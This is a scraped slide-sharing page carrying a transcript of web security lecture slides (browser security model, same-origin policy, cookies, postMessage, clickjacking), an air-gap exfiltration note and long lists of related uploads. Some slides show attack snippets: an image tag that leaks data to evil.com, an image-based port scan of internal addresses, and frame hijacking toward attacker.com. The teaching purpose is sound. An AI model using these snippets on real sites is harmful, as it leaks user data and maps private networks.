Why? Routes in a city have unique power fingerprints
Three goals:
1. identify route car is taking among a known set of routes ✓
2. identify car's location along a known route ✓
3. identify car's route based on a database of pre-measured short segments ✓
Identify location along known route
Main tool: dynamic time warping (DTW)
⇒ Aligns pre-recorded data with current samples
Lessons
Sensors can have unintended consequences
There is risk in giving apps direct access to sensors
Prevention:
• Always require permissions to access sensors
• Reduce data from sensors to min needed for utility
or only provide abstract view of sensor data
Final note: limitations of air gaps
A machine holds sensitive data and is isolated from the network
• If it gets infected, can the malware exfiltrate data?
Answer: yes! [Usenix Sec 2015]
• Mimic GSM signals using data bus
• Use x86 instruction: MOVNTDQ m128, xmm
• Effective for 60 feet
Css Founder
 
Cos 432 web_security
Cos 432 web_securityCos 432 web_security
Cos 432 web_security
Michael Freyberger
 
Minor Mistakes In Web Portals
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portals
msobiegraj
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
Daniel Owens
 
Application Security
Application SecurityApplication Security
Application Security
nirola
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot
Jeremiah Grossman
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
abhijitapatil
 
Introduction to Web Architecture
Introduction to Web ArchitectureIntroduction to Web Architecture
Introduction to Web Architecture
Chamnap Chhorn
 
Chapter5-Bypass-ClientSide-Control-Presentation.pptx
Chapter5-Bypass-ClientSide-Control-Presentation.pptxChapter5-Bypass-ClientSide-Control-Presentation.pptx
Chapter5-Bypass-ClientSide-Control-Presentation.pptx
ilhamilyas5
 

Similar to XCS110_All_Slides.pdf (20)

Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
 
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
 
Building Social Enterprise with Ruby and Salesforce
Building Social Enterprise with Ruby and SalesforceBuilding Social Enterprise with Ruby and Salesforce
Building Social Enterprise with Ruby and Salesforce
 
Decoding the Web
Decoding the WebDecoding the Web
Decoding the Web
 
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric Vanderburg
Ethical hacking   Chapter 10 - Exploiting Web Servers - Eric VanderburgEthical hacking   Chapter 10 - Exploiting Web Servers - Eric Vanderburg
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric Vanderburg
 
Browser security
Browser securityBrowser security
Browser security
 
21. Application Development and Administration in DBMS
21. Application Development and Administration in DBMS21. Application Development and Administration in DBMS
21. Application Development and Administration in DBMS
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
 
Website designing company in faridabad
Website designing company in faridabadWebsite designing company in faridabad
Website designing company in faridabad
 
Cos 432 web_security
Cos 432 web_securityCos 432 web_security
Cos 432 web_security
 
Minor Mistakes In Web Portals
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portals
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 
Application Security
Application SecurityApplication Security
Application Security
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Introduction to Web Architecture
Introduction to Web ArchitectureIntroduction to Web Architecture
Introduction to Web Architecture
 
Chapter5-Bypass-ClientSide-Control-Presentation.pptx
Chapter5-Bypass-ClientSide-Control-Presentation.pptxChapter5-Bypass-ClientSide-Control-Presentation.pptx
Chapter5-Bypass-ClientSide-Control-Presentation.pptx
 

Recently uploaded

Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
SOFTTECHHUB
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
Kumud Singh
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
shyamraj55
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
KAMESHS29
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
Daiki Mogmet Ito
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
Neo4j
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Malak Abu Hammad
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
Claudio Di Ciccio
 
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceAI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
IndexBug
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
Uni Systems S.M.S.A.
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
Matthew Sinclair
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
kumardaparthi1024
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
mikeeftimakis1
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
Neo4j
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
Tomaz Bratanic
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
Matthew Sinclair
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
SOFTTECHHUB
 

Recently uploaded (20)

Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
 
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceAI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
 

XCS110_All_Slides.pdf

  • 2.
  • 3. HTTP Rendering the Content Isolation Navigation Communication Client State Click-Jacking Frame Busting MODULE 2
  • 4. Introduction Module 2: Web Background and the Browser Security Model
  • 5. Reported Web Vulnerabilities "In the Wild" Data from aggregator and validator of NVD-reported vulnerabilities
  • 6. Web vs System vulnerabilities Decline in % web vulnerabilities since 2009 § 49% in 2010 -> 37% in 2011. § Big decline in SQL Injection vulnerabilities XSS peak
  • 7. Web application vulnerabilities 49% 51% Web Application Vulnerabilities as a Percentage of All Disclosures in 2010 Web Applications (49%) Others (51%) 37% 63% Web Application Vulnerabilities as a Percentage of All Disclosures in 2011 H1 Web Applications (49%) Others (51%)
  • 8.
  • 9. Web Security Challenge Bad Server Good server User How can honest users safely interact with well-intentioned sites, while still freely browsing the web (search, shopping, etc.) ? Network Enter password? Can also operate as client to other servers Browser
  • 10. Goals of web security Safely browse the web § Users should be able to visit a variety of web sites, without incurring harm: › No stolen information (without user’s permission) › Site A cannot compromise session at Site B Support secure web applications § Applications delivered over the web should have the same security properties we require for stand-alone applications And § Since many mobile apps are interfaces to web sites, § Support security for mobile apps.
  • 11. Web Threat Models Web attacker § Control attacker.com § Can obtain SSL/TLS certificate for attacker.com § User visits attacker.com › Or: runs attacker’s Facebook app Network attacker § Passive: Wireless eavesdropper § Active: Evil router, DNS poisoning Malware attacker § Attacker escapes browser isolation mechanisms and run separately under control of OS
  • 12. Outline § Web security goals and threat models § HTTP § Rendering: Html, DOM, embedded content, JavaScript § Isolation: frames, same-origin policy, HTML5 sandboxing § Communication: fragment, post-message, cross-origin request § Frame navigation: Same-origin policy, descendant policy § Client storage: Cookies, Local storage, Native Client § Click-jacking, tap-jacking, frame busting
  • 13. HTTP Module 2: Web Background and the Browser Security Model
  • 14. Uniform Resource Locator (URL) Global identifier of network-retrievable content Example: http://stanford.edu:81/class?name=cs155#homework Special characters are encoded as hex: § %0A = newline § %20 or + = space, %2B = + (special exception) Protocol Hostname Port Path Query Fragment
  • 15. GET /index.html HTTP/1.1 Accept: image/gif, image/x-bitmap, image/jpeg, */* Accept-Language: en Connection: Keep-Alive User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95) Host: www.example.com Referer: http://www.google.com?q=dingbats HTTP Request Method File HTTP version Headers Data – none for GET Blank line GET : no side effect POST : possible side effect
  • 16. HTTP/1.0 200 OK Date: Sun, 21 Apr 1996 02:20:42 GMT Server: Microsoft-Internet-Information-Server/5.0 Connection: keep-alive Content-Type: text/html Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT Set-Cookie: … Content-Length: 2543 <HTML> Some data... blah, blah, blah </HTML> HTTP Response HTTP version Status code Reason phrase Headers Data Cookies
  • 17. Rendering Content Module 2: Web Background and the Browser Security Model
  • 19. Browser execution model Each browser window or frame § Loads content § Renders it › Processes HTML and scripts to display page › May involve images, subframes, etc. § Responds to events Events can be § User actions: OnClick, OnMouseover § Rendering: OnLoad, OnBeforeUnload § Timing: setTimeout(), clearTimeout()
  • 20. <head> <title>Washington Post: Breaking News, World, US, DC News .. Analysis</title> ... </head> <body class="eidos homepage sectionfront"> <script type="text/javascript"> if(self!==top&&!(top.window.location.pathname).startsWith('/PortalEdito r')){top.location=self.location;} </script> ... <h2 class="headline"><a href="/world/national-security/nsa-gathered- thousands-of-americans-e-mails-before-court-struck-down- program/2013/08/21/146ba4b6-0a90-11e3-b87c-476db8ac34cd_story.html"> Secret court: <br>NSA gathered thousands of domestic e-mails</a> ... <p class="byline">Ellen Nakashima&#32…</p> <p class=""> The program unlawfully gathered as many as tens of thousands of e-mails, according to a 2011 opinion.</p> ... <div class="hide"><img class="" src="http://ad.doubleclick.net/ad/N4359.washingtonpost.com/B7241351.19;sz=1x1 ;ord=[timestamp]?" width="1" height="1" border="0" style="display: inline- block; "></div> ... Share this video: ... <a class="facebook_static" onclick="TWP.Module.SocialButtons.staticSocialPopup('http://www.facebook.com/ sharer.php?u=http://www.washingtonpost.com/posttv/video/thefold/tonight-on- the-fold-august-21-2013/2013/08/21/36ed282c-0a98-11e3-9941- 6711ed662e71_video.html%3Ffb_ref%3Dsm_btn_fb')"> ...
  • 21. Document Object Model (DOM) Object-oriented interface used to read and write docs § web page in HTML is structured data § DOM provides representation of this hierarchy Examples § Properties: document.alinkColor, document.URL, document.forms[ ], document.links[ ], document.anchors[ ] § Methods: document.write(document.referrer) Includes Browser Object Model (BOM) § window, document, frames[], history, location, navigator (type and version of browser)
  • 22. Changing HTML using Script, DOM Some possibilities § createElement(elementName) § createTextNode(text) § appendChild(newChild) § removeChild(node) Example: Add a new list item: var list = document.getElementById('t1') var newitem = document.createElement('li') var newtext = document.createTextNode(text) list.appendChild(newitem) newitem.appendChild(newtext) <ul id="t1"> <li> Item 1 </li> </ul> HTML
  • 23. HTML Image Tags Displays this nice picture è Security issues? <html> … <p> … </p> … <img src=“http://example.com/sunset.gif” height="50" width="100"> … </html> Basic web functionality
  • 24. Image tag security issues Communicate with other sites § <img src=“http://evil.com/pass-local-information.jpg?extra_information”> Hide resulting image § <img src=“ … ” height=“1" width=“1"> Spoof other sites § Add logos that fool a user Important Point: A web page can send information to any site Security consequences
  • 25. JavaScript onError Basic function § Triggered when error occurs loading a document or an image Example § Runs onError handler if image does not exist and cannot load <img src="image.gif" onerror="alert('The image could not be loaded.')“ > http://www.w3schools.com/jsref/jsref_onError.asp Basic web functionality
  • 26. JavaScript timing Sample code § When response header indicates that page is not an image, the browser stops and notifies JavaScript via the onerror handler. <html><body><img id="test" style="display: none"> <script> var test = document.getElementById(’test’); var start = new Date(); test.onerror = function() { var end = new Date(); alert("Total time: " + (end - start)); } test.src = "http://www.example.com/page.html"; </script> </body></html> Basic web functionality
  • 27. Port scanning behind firewall JavaScript can: § Request images from internal IP addresses › Example: <img src=“192.168.0.4:8080”/> § Use timeout/onError to determine success/failure § Fingerprint webapps using known image names Server Malicious Web page Firewall 1) “show me dancing pigs!” 2) “check this out” Browser scan scan scan 3) port scan results Basic web functionality
  • 28. Remote scripting Goal § Exchange data between a client-side app running in a browser and server-side app, without reloading page Methods § Java Applet/ActiveX control/Flash › Can make HTTP requests and interact with client-side JavaScript code, but requires LiveConnect (not available on all browsers) § XML-RPC › open, standards-based technology that requires XML-RPC libraries on server and in your client-side code. § Simple HTTP via a hidden IFRAME › IFRAME with a script on your web server (or database of static HTML files) is by far the easiest of the three remote scripting options See: http://developer.apple.com/internet/webcontent/iframe.html Important Point: A web can maintain bi-directional communication with browser (until user closes/quits)
  • 29. Simple remote scripting example <script type="text/javascript"> function handleResponse() { alert('this function is called from server.html') } </script> <iframe id="RSIFrame" name="RSIFrame" style="width:0px; height:0px; border: 0px" src="blank.html"> </iframe> <a href="server.html" target="RSIFrame">make RPC call</a> <script type="text/javascript"> window.parent.handleResponse() </script> server.html: another page on same server, could be server.php, etc client.html: RPC by passing arguments to server.html in query string RPC can be done silently in JavaScript, passing and receiving arguments
  • 30. Isolation Module 2: Web Background and the Browser Security Model
  • 31. Frame and iFrame Window may contain frames from different sources § Frame: rigid division as part of frameset § iFrame: floating inline frame iFrame example Why use frames? § Delegate screen area to content from another source § Browser provides isolation based on frames § Parent may work even if frame is broken <iframe src="hello.html" width=450 height=100> If you can see this, your browser doesn't understand IFRAME. </iframe>
  • 33. Analogy Operating system Primitives § System calls § Processes § Disk Principals: Users § Discretionary access control Vulnerabilities § Buffer overflow § Root exploit Web browser Primitives § Document object model § Frames § Cookies / localStorage Principals: “Origins” § Mandatory access control Vulnerabilities § Cross-site scripting § Cross-site request forgery § Cache history attacks § …
  • 34. Browser security mechanism Each frame of a page has an origin § Origin = protocol://host:port Frame can access its own origin § Network access, Read/write DOM, Storage (cookies) Frame cannot access data associated with a different origin A A B B A
  • 35. Components of browser security policy Frame-Frame relationships § canScript(A,B) › Can Frame A execute a script that manipulates arbitrary/nontrivial DOM elements of Frame B? § canNavigate(A,B) › Can Frame A change the origin of content for Frame B? Frame-principal relationships § readCookie(A,S), writeCookie(A,S) › Can Frame A read/write cookies from site S?
  • 36. Library import excluded from SOP <script src=https://seal.verisign.com/getseal? host_name=a.com></script> •Script has privileges of imported page, NOT source server. •Can script other pages in this origin, load more scripts •Same issues with other forms of importing VeriSign
  • 37. Domain Relaxation Origin: scheme, host, (port), hasSetDomain Try document.domain = document.domain www.facebook.com www.facebook.com www.facebook.com chat.facebook.com chat.facebook.com
  • 38. Domain Relaxation Origin: scheme, host, (port), hasSetDomain Try document.domain = document.domain www.facebook.com www.facebook.com www.facebook.com chat.facebook.com chat.facebook.com facebook.com facebook.com
  • 39. HTML5 Frame sandbox Specify sandbox attribute of iframe <iframe sandbox src="http://untrusted.site.net/content"></iframe> Creates restricted frame § Plugins are disabled. Any kind of ActiveX, Flash, or Silverlight plugin will not be executed. § Forms are disabled. The hosted content is not allowed to post forms back to any target. § Scripts are disabled. JavaScript is disabled and will not execute. § Links to other browsing contexts are disabled. An anchor tag targeting different browser levels will not execute. § Unique origin treatment. All content is treated under a unique origin. The content is not able to traverse the DOM or read cookie information.
  • 40. Optional attributes relax sandbox allow-forms § Allows embedded page to post back using a form submit within the frame. allow-scripts § Enables JavaScript allow-same-origin § Can access DOM of another frame, subject to same-origin policy § Only useful with allow-scripts § But be careful: parent frame can manipulate sandbox attributes and remove further restrictions. allow-top-navigation § Allow content to navigate entire tab/window allow-popups § Allow embedded content to open new popup windows
  • 41. Navigation Module 2: Web Background and the Browser Security Model
  • 43. What should the policy be? 43 Child Sibling Descendant Frame Bust
  • 44. Browser Policy IE 6 (default) Permissive IE 6 (option) Child IE7 (no Flash) Descendant IE7 (with Flash) Permissive Firefox 2 Window Safari 3 Permissive Opera 9 Window HTML 5 Child Legacy Browser Behavior
  • 45. Window Policy Anomaly top.frames[1].location = "http://www.attacker.com/..."; top.frames[2].location = "http://www.attacker.com/..."; ...
  • 46. Browser Policy IE 6 (default) Permissive IE 6 (option) Child IE7 (no Flash) Descendant IE7 (with Flash) Permissive Firefox 2 Window Safari 3 Permissive Opera 9 Window HTML 5 Child Legacy Browser Behavior
  • 47. Browser Policy IE7 (no Flash) Descendant IE7 (with Flash) Descendant Firefox 3 Descendant Safari 3 Descendant Opera 9 (many policies) HTML 5 Descendant Adoption of Descendent Policy
  • 48. Communication Module 2: Web Background and the Browser Security Model
  • 49. Fragment Identifier Messaging Send information by navigating a frame § http://gadget.com/#hello Navigating to fragment doesn’t reload frame § No network traffic, but frame can read its fragment Not a secure channel § Confidentiality § Integrity § Authentication ü û ü
  • 50. window.postMessage API for inter-frame communication § Supported in current browsers § A network-like channel between frames Add a contact Share contacts
  • 51. window.addEventListener("message", function (e) { if (e.origin == "http://a.com") { ... e.data ... } }, false); frames[0].postMessage("Attack at dawn!", "http://b.com/"); postMessage syntax Facebook Anecdote Attack at dawn!
  • 52. frames[0].postMessage("Attack at dawn!"); Why include “targetOrigin”? What goes wrong? Messages sent to frames, not principals § When would this happen? 52
  • 53. Two-way communication A method call is associated with a response Can build this on top of postMessage § Messenger: Each time you call a method in the iframe, you pass a reply function that is called with the results of that method call.
  • 54. jQuery postMessage plugin Wraps the postMessage API and simplifies its usage. Works in browsers that do not support postMessage method by using fragment navigation (hash portion of the url)
  • 55. Network communication Cross-origin network requests Access-Control-Allow-Origin: <list of domains> Access-Control-Allow-Origin: * Site B Site A Site A context Site B context
  • 56. Client State Module 2: Web Background and the Browser Security Model
  • 57. Cookies Used to store state on user’s machine Browser Server POST … HTTP Header: Set-cookie: NAME=VALUE ; domain = (who can read) ; expires = (when expires) ; secure = (only over SSL) Browser Server GET … Cookie: NAME = VALUE HTTP is stateless protocol; cookies add state If expires=NULL: this session only
  • 58. Cookie authentication Browser Web Server Auth server POST login.cgi Username & pwd Validate user auth=val Store val Set-cookie: auth=val GET restricted.html Cookie: auth=val restricted.html auth=val YES/NO If YES, restricted.html Check val
  • 59. Cookie Security Policy Uses: § User authentication § Personalization § User tracking: e.g. Doubleclick (3rd party cookies) Origin is the tuple <domain, path> § Can set cookies valid across a domain suffix § Complicated and implementation-specific rules for selecting cookie values, when many cookies apply
  • 60. Secure Cookies Browser Server GET … HTTP Header: Set-cookie: NAME=VALUE ; Secure=true • Provides confidentiality against network attacker • Browser will only send cookie back over HTTPS • … but no integrity • Can rewrite secure cookies over HTTP ⇒ network attacker can rewrite secure cookies ⇒ can log user into attacker’s account
  • 61. httpOnly Cookies Browser Server GET … HTTP Header: Set-cookie: NAME=VALUE ; httpOnly • Cookie sent over HTTP(s), but not accessible to scripts • cannot be read via document.cookie • Helps prevent cookie theft via XSS … but does not stop most other risks of XSS bugs
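Added example, not from the slides: a small Python checker for the Set-Cookie attributes of slides 57–61, plus a toy cookie jar that mimics a browser sending Secure cookies only over HTTPS yet, as slide 60 notes, still letting a Set-Cookie received over plain HTTP overwrite them. Function and class names are mine; the header values are constructed.

```python
from typing import Dict, List


def parse_set_cookie(header: str) -> Dict[str, object]:
    """Split one Set-Cookie header value into name, value and lower-cased attributes."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_set_cookie(header: str) -> List[str]:
    """Report the weaknesses slides 57-61 warn about for one cookie."""
    attrs = parse_set_cookie(header)["attrs"]
    findings = []
    if "secure" not in attrs:
        findings.append("no Secure: also sent over plain HTTP, readable by a network attacker")
    if "httponly" not in attrs:
        findings.append("no HttpOnly: readable from document.cookie, so XSS can steal it")
    if "expires" not in attrs and "max-age" not in attrs:
        findings.append("no Expires: session cookie, kept until the browser closes")
    return findings


class ToyCookieJar:
    """Browser-side store; domain/path matching is omitted to keep the example short."""

    def __init__(self):
        self.cookies = {}

    def store(self, response_scheme: str, header: str) -> None:
        # Classic behaviour: a Set-Cookie from an http:// response is accepted even when
        # it overwrites a Secure cookie (confidentiality but no integrity, slide 60).
        # Browsers with "strict secure cookies" refuse this; the slide assumes the old rule.
        cookie = parse_set_cookie(header)
        cookie["from"] = response_scheme
        self.cookies[cookie["name"]] = cookie

    def cookie_header(self, request_scheme: str) -> str:
        """Cookie header the browser would attach to a request over this scheme."""
        sendable = [f"{c['name']}={c['value']}" for c in self.cookies.values()
                    if request_scheme == "https" or "secure" not in c["attrs"]]
        return "; ".join(sendable)
```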
  • 62. HTML5 Local Storage Based on named key/value pairs § Store data based on a named key (a string) § Retrieve that data with the same key § Data can be any type supported by JavaScript › Including strings, Booleans, integers, floats › But data is actually stored as a string Need to use functions like parseInt() or parseFloat() to coerce your retrieved data into the expected JavaScript datatype Some browsers also implement Web SQL Database § Other forms of local storage would also be useful
  • 63. Example: save a sentence in Local Storage, then retrieve it:
    localStorage.setItem(1, 'This is a sample sentence');  // keys and values are stored as strings: the key 1 becomes "1"
    var data = localStorage.getItem(1);
    Local Storage also supports length, removeItem() and clear().
  • 64. Security issues Storage per origin § Origin is: scheme, host, port Could be accessed by user with local access (varies by browser) Can be accessed by JavaScript in page § no httpOnly so vulnerable to XSS attacks XSS attacks can read local storage § Do not store sensitive information XSS attacks can write local storage § Do not trust data read from local storage
  • 67. Sandbox techniques Static analysis § No loads or stores permitted outside the data sandbox › Enforced by operating system protection mechanisms § No unsafe instructions › Examples: syscall, int, and lds. § Control flow integrity › All direct, indirect branches target a safe instruction Dynamic monitoring § Native Client runtime mediates system calls
  • 68. Click-Jacking Module 2: Web Background and the Browser Security Model
  • 69. Clickjacking: attacker overlays multiple transparent or opaque frames to trick a user into clicking on a button or link on another page. Clicks meant for the visible page are hijacked and routed to another, invisible page
  • 70. Clickjacking in the Wild: Google search for “clickjacking” returns 342,000 results… this is not a hypothetical threat! Summer 2010: Facebook worm superimposes an invisible iframe over the entire page that links back to the victim's Facebook page § If victim is logged in, automatically recommends link to new friends as soon as the page is clicked on. Many clickjacking attacks against Twitter § Users send out tweets against their will
  • 72. Frame Busting Module 2: Web Background and the Browser Security Model
  • 73. Frames embed HTML documents in other documents:
